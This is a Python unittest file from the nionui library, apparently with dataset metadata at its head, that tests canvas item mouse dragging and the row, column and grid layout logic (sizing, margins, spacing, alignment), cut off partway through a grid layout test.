| 0
| 0
| 0
| 0
| 0
| 0
| 0.224138
| 58
| 4
| 24
| 14.5
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a35e7da8fdec935ebecf3342dfe62cfac29e4bd
| 107,022
|
py
|
Python
|
nion/ui/test/CanvasItem_test.py
|
AEljarrat/nionui
|
3714a54d56f472a8a0f7b9f8a8240103ca790374
|
[
"Apache-2.0"
] | null | null | null |
nion/ui/test/CanvasItem_test.py
|
AEljarrat/nionui
|
3714a54d56f472a8a0f7b9f8a8240103ca790374
|
[
"Apache-2.0"
] | null | null | null |
nion/ui/test/CanvasItem_test.py
|
AEljarrat/nionui
|
3714a54d56f472a8a0f7b9f8a8240103ca790374
|
[
"Apache-2.0"
] | null | null | null |
# standard libraries
import contextlib
import logging
import time
import unittest
# third party libraries
# None
# local libraries
from nion.ui import CanvasItem
from nion.ui import DrawingContext
from nion.ui import TestUI
from nion.utils import Geometry
class TestCanvasItem(CanvasItem.AbstractCanvasItem):
def __init__(self):
super(TestCanvasItem, self).__init__()
self.wants_mouse_events = True
self._mouse_released = False
self.key = None
def mouse_pressed(self, x, y, modifiers):
return True
def mouse_released(self, x, y, modifiers):
self._mouse_released = True
def key_pressed(self, key):
self.key = key
def key_released(self, key):
self.key_r = key
class TestCanvasItemClass(unittest.TestCase):
def setUp(self):
CanvasItem._threaded_rendering_enabled = False
def tearDown(self):
pass
def simulate_drag(self, canvas_widget, p1, p2, modifiers=None):
modifiers = CanvasItem.KeyboardModifiers() if not modifiers else modifiers
canvas_widget.on_mouse_pressed(p1[1], p1[0], modifiers)
canvas_widget.on_mouse_position_changed(p1[1], p1[0], modifiers)
midp = Geometry.midpoint(p1, p2)
canvas_widget.on_mouse_position_changed(midp[1], midp[0], modifiers)
canvas_widget.on_mouse_position_changed(p2[1], p2[0], modifiers)
canvas_widget.on_mouse_released(p2[1], p2[0], modifiers)
def test_drag_inside_bounds(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
canvas_widget.canvas_item.add_canvas_item(canvas_item)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_drag_outside_bounds(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
canvas_widget.canvas_item.add_canvas_item(canvas_item)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (-30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_drag_within_composition(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
container = CanvasItem.CanvasItemComposition()
container.add_canvas_item(canvas_item)
canvas_widget.canvas_item.add_canvas_item(container)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_drag_within_composition_but_outside_bounds(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
container = CanvasItem.CanvasItemComposition()
container.add_canvas_item(canvas_item)
canvas_widget.canvas_item.add_canvas_item(container)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (-30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_layout_uses_minimum_aspect_ratio(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].sizing.minimum_aspect_ratio = 2.0
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=80))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=320))
def test_layout_uses_maximum_aspect_ratio(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].sizing.maximum_aspect_ratio = 1.0
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=80, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=480, height=480))
def test_composition_layout_uses_preferred_aspect_ratio(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
child_canvas = CanvasItem.CanvasItemComposition()
child_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(child_canvas)
child_canvas.sizing.preferred_aspect_ratio = 1.0
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=80, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=480, height=480))
def test_composition_layout_sizing_includes_margins_but_not_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout.margins = Geometry.Margins(top=4, bottom=6, left=8, right=10)
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 24
self.assertEqual(canvas_item.layout_sizing.minimum_width, 16 + 8 + 10)
self.assertEqual(canvas_item.layout_sizing.maximum_height, 24 + 4 + 6)
def test_row_layout_sizing_includes_margins_and_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(spacing=7, margins=Geometry.Margins(top=4, bottom=6, left=8, right=10))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 12
canvas_item.canvas_items[1].sizing.minimum_width = 32
canvas_item.canvas_items[1].sizing.maximum_height = 24
canvas_item.canvas_items[2].sizing.minimum_width = 48
canvas_item.canvas_items[2].sizing.maximum_height = 36
self.assertEqual(canvas_item.layout_sizing.minimum_width, 16 + 32 + 48 + 2 * 7 + 8 + 10) # includes margins and spacing
self.assertEqual(canvas_item.layout_sizing.maximum_height, 36 + 4 + 6) # includes margins only
def test_column_layout_sizing_includes_margins_and_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(spacing=7, margins=Geometry.Margins(top=4, bottom=6, left=8, right=10))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 12
canvas_item.canvas_items[1].sizing.minimum_width = 32
canvas_item.canvas_items[1].sizing.maximum_height = 24
canvas_item.canvas_items[2].sizing.minimum_width = 48
canvas_item.canvas_items[2].sizing.maximum_height = 36
self.assertEqual(canvas_item.layout_sizing.minimum_width, 48 + 8 + 10) # includes margins only
self.assertEqual(canvas_item.layout_sizing.maximum_height, 12 + 24 + 36 + 2 * 7 + 4 + 6) # includes margins and spacing
def test_grid_layout_sizing_includes_margins_and_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2), spacing=7, margins=Geometry.Margins(top=4, bottom=6, left=8, right=10))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=0, y=1))
#canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=1, y=1))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 12
canvas_item.canvas_items[1].sizing.minimum_width = 32
canvas_item.canvas_items[1].sizing.maximum_height = 24
canvas_item.canvas_items[2].sizing.minimum_width = 48
canvas_item.canvas_items[2].sizing.maximum_height = 36
self.assertEqual(canvas_item.layout_sizing.minimum_width, 32 + 48 + 1 * 7 + 8 + 10) # includes margins only
self.assertEqual(canvas_item.layout_sizing.maximum_height, 24 + 36 + 1 * 7 + 4 + 6) # includes margins and spacing
def test_layout_splits_evening_between_two_items(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=320, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=320, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=320, height=480))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=240))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=0, y=240))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=640, height=240))
def test_layout_splits_evening_between_three_items_with_spacing_and_margins(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(spacing=10, margins=Geometry.Margins(top=3, left=5, bottom=7, right=11))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=5, y=3))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=201, height=470))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=216, y=3))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=201, height=470))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=427, y=3))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=202, height=470))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(spacing=10, margins=Geometry.Margins(top=3, left=5, bottom=7, right=11))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=5, y=3))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=624, height=150))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=5, y=163))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=624, height=150))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=5, y=323))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=624, height=150))
def test_layout_splits_two_with_first_one_minimum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[0].sizing.minimum_width = 500
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=500, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=500, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=140, height=480))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[0].sizing.minimum_height = 300
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=300))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=0, y=300))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=640, height=180))
def test_layout_splits_two_with_second_one_minimum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[1].sizing.minimum_width = 500
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=140, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=140, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=500, height=480))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[1].sizing.minimum_height = 300
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=180))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=0, y=180))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=640, height=300))
def test_layout_splits_two_with_first_one_maximum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[0].sizing.maximum_width = 100
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=100, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=100, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=540, height=480))
def test_layout_splits_two_with_second_one_maximum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[1].sizing.maximum_width = 100
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=540, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=540, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=100, height=480))
def disabled_test_layout_splits_three_with_maximum_making_room_for_minimized_item(self):
# this should work, but the particular solver has trouble in this specific case because it reaches
# the minimum value of 230 on the first pass before it processes the maximum value of 100 and it
# should be able to go back and raise the 230 to 270 once it sees it has extra space.
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.canvas_items[0].sizing.minimum_width = 230
canvas_item.canvas_items[1].sizing.maximum_width = 100
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
for i, child_canvas_item in enumerate(canvas_item.canvas_items):
print("{} {} {}".format(i, child_canvas_item.canvas_origin, child_canvas_item.canvas_size))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=270, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=270, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=100, height=480))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=370, y=0))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=270, height=480))
def test_column_with_child_with_fixed_size_does_not_expand_child_horizontally(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_bounds, Geometry.IntRect.from_tlbr(0, 0, 20, 30))
def test_column_with_fixed_size_child_centers_horizontally_by_default(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 305, 250, 335))
def test_column_with_fixed_size_child_aligns_start(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(alignment="start")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 0, 250, 30))
def test_column_with_fixed_size_child_aligns_end(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(alignment="end")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 610, 250, 640))
def test_row_with_fixed_size_child_centers_horizontally_by_default(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 305, 250, 335))
def test_row_with_fixed_size_child_aligns_start(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(alignment="start")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(0, 305, 20, 335))
def test_row_with_fixed_size_child_aligns_end(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(alignment="end")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(460, 305, 480, 335))
def test_row_layout_with_stretch_inside_column_layout_results_in_correct_vertical_positions(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
row = CanvasItem.CanvasItemComposition()
row.layout = CanvasItem.CanvasItemRowLayout()
row.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
row.add_stretch()
canvas_item.add_canvas_item(row)
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_stretch()
canvas_item.canvas_items[0].canvas_items[0].sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.canvas_items[1].sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_items[0].canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 20, 30))
self.assertEqual(canvas_item.canvas_items[1].canvas_rect, Geometry.IntRect.from_tlbr(20, 305, 40, 335))
def test_row_layout_with_stretch_inside_column_layout_results_in_correct_row_height(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
row = CanvasItem.CanvasItemComposition()
row.layout = CanvasItem.CanvasItemRowLayout()
row.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
row.add_stretch()
canvas_item.add_canvas_item(row)
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].canvas_items[0].sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.canvas_items[1].sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_items[0].canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 20, 30))
self.assertEqual(canvas_item.canvas_items[1].canvas_rect, Geometry.IntRect.from_tlbr(20, 305, 40, 335))
def test_row_layout_with_stretch_on_each_side_centers_content(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
row = CanvasItem.CanvasItemComposition()
row.layout = CanvasItem.CanvasItemRowLayout()
row.add_stretch()
content_item = CanvasItem.BackgroundCanvasItem("#F00")
content_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
row.add_canvas_item(content_item)
row.add_stretch()
canvas_item.add_canvas_item(row)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(content_item.canvas_rect, Geometry.IntRect.from_tlbr(0, 305, 20, 335))
def test_grid_layout_2x2_works(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=320, height=240))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=320, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=320, height=240))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=0, y=240))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=320, height=240))
self.assertEqual(canvas_item.canvas_items[3].canvas_origin, Geometry.IntPoint(x=320, y=240))
self.assertEqual(canvas_item.canvas_items[3].canvas_size, Geometry.IntSize(width=320, height=240))
def test_grid_layout_splits_with_one_min_size_specified(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
canvas_item.canvas_items[1].sizing.minimum_height = 300
canvas_item.canvas_items[1].sizing.minimum_width = 500
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=140, height=300))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=140, y=0))
